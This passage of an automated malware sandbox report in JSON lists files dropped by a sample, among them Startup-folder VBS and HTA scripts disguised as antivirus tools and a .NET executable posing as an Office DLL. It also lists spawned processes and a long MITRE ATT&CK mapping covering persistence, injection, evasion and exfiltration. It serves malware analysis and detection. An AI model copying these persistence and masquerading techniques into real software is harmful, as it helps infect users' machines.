"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs", "file_size": 10312, "sha256": "556700ac50ffa845e5de853498242ee5abb288eb5b8ae1ae12bfdb5746e3b7b1", "type_tags": ["text"], "description": "C source, ASCII text", "runtime_process": "11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe (PID: 5932)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "KasperskyScanner.hta", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta", "file_size": 6995, "sha256": "1a8083787b336b322510f93d930f52aedeb90d2052501e864bfa5b1906e74d58", "type_tags": ["html"], "description": "HTML document, ASCII text, with CRLF line terminators", "runtime_process": "11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe (PID: 5932)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "YourMom.vbs", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMom.vbs", "file_size": 13584, "sha256": "0d2f271fe7d7a6c9252ebf6e99146991d9ad5bfbb3431d380c00419889d392d6", "type_tags": ["text"], "description": "ASCII text", "runtime_process": "11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe (PID: 5932)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xlsrvintl.dll", "file_path": "%COMMONPROGRAMFILES%\\microsoft shared\\OFFICE14\\1033\\xlsrvintl.dll", "file_size": 3181056, "sha256": "11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe (PID: 5932)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "services", "file_path": "%WINDIR%\\System32\\drivers\\etc\\services", "file_size": 79, "sha256": "8fd9c10a4641311464f5a6529b4d2b23c5727d44cf735b05336d63fb905c9173", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe (PID: 5932)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dism.log", "file_size": 266985, "sha256": "4e0ce5f4b9014801c7dd25e99352d2edfd594bdda1d5ecebd1f66bfeebc3ecc9", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67AB4062.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "RecoveryStore._85558835-E86A-11EF-98CC-00505691CC82_.dat", "file_size": 5632, "sha256": "c0a7a864d355433be21260858e1bb4696178fea3f795e30540a6a486b070424e", "type_tags": ["text"], "description": "Composite Document File V2 Document, Cannot read section info", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "YourMomIsGay.html.bin", "file_size": 5107, "sha256": "390e460334ec801fdeadb511d7404ff2c8b7a0a945a0c763d0b3354e15639dbf", "type_tags": ["html"], "description": "HTML document, ISO-8859 text, with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_85558837-E86A-11EF-98CC-00505691CC82_.dat", "file_size": 4608, "sha256": "206abf6d780cf23427c078ca84bd5743bd1ed18b8796afb867784ce2a4f67fdd", "type_tags": ["text"], "description": "Composite Document File V2 Document, Cannot read section info", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": [], "imported_objects": [], "file_analysis": [], "total_file_compositions_imports": null}, "processes": [{"uid": "00000000-00005932", "name": "11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe", "normalized_path": "C:\\11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe", "sha256": "11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4"}, {"uid": "00000000-00005460", "name": "iexplore.exe", "normalized_path": "%PROGRAMFILES%\\Internet Explorer\\iexplore.exe", "command_line": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMomIsGay.html", "sha256": "8abc7daa81c8a20bfd88b6a60ecc9ed1292fbb6cedbd6f872f36512d9a194bba"}, {"uid": "00000000-00005768", "parentuid": "00000000-00005460", "name": "iexplore.exe", "normalized_path": "%PROGRAMFILES%\\Internet Explorer\\iexplore.exe", "command_line": "SCODEF:5460 CREDAT:275457 /prefetch:2", "sha256": "8abc7daa81c8a20bfd88b6a60ecc9ed1292fbb6cedbd6f872f36512d9a194bba"}, {"uid": "00000000-00004276", "name": "WScript.exe", "normalized_path": "%WINDIR%\\System32\\WScript.exe", "command_line": "\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs\"", "sha256": "2160ba6829909eeb1d272ac4a5f43588750c0b4743477bf2b46952033b5d4b3b"}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Domains", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001", "informative_identifiers_count": 2, "parent": {"technique": "Acquire Infrastructure", "attck_id": "T1583", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583"}}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Visual Basic", "attck_id": "T1059.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 2, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Rootkit", "attck_id": "T1014", "attck_id_wiki": "https://attack.mitre.org/techniques/T1014", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Asynchronous Procedure Call", "attck_id": "T1055.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/004", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Search Order Hijacking", "attck_id": "T1574.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Code Signing", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002", "informative_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "informative_identifiers_count": 21}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Removable Media", "attck_id": "T1025", "attck_id_wiki": "https://attack.mitre.org/techniques/T1025", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "suspicious_identifiers_count": 2, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 4, "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Dead Drop Resolver", "attck_id": "T1102.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Web Service", "attck_id": "T1102", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102"}}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Exfiltration Over Web Service", "attck_id": "T1567", "attck_id_wiki": "https://attack.mitre.org/techniques/T1567", "suspicious_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Data Manipulation", "attck_id": "T1565", "attck_id_wiki": "https://attack.mitre.org/techniques/T1565", "malicious_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00005932)\n 